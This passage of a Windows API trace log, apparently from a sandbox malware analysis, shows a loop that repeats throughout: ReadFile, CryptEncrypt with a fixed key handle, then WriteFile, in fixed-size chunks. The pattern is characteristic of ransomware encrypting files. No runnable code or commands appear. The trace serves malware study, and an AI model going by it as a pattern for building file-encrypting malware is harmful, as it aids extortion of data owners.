lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.678] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.678] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.678] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.678] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.678] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.678] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.678] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.679] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.679] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.679] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.679] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.679] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.679] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.679] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.679] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.679] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.679] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.679] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.680] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.680] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.680] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.680] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.680] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.680] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.680] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.680] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.680] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.680] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.680] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.680] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.680] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.681] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.681] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.681] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.681] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.681] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.681] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.681] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.681] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.681] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.681] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.681] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.681] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.681] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.682] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.682] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.682] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.682] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.682] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.682] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.682] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.682] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.682] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.682] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.682] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.682] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.682] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.683] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.683] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.683] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.683] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.683] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.683] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.683] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.683] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.683] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.683] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.683] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.683] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.683] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.684] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.684] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.684] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.684] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.684] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.684] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.684] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.684] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.684] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.684] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.684] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.684] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.685] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.685] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.685] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.685] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.685] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.685] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.685] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.685] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.685] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.685] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.685] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.686] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.686] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.686] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.686] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.686] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.686] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.686] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.686] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) 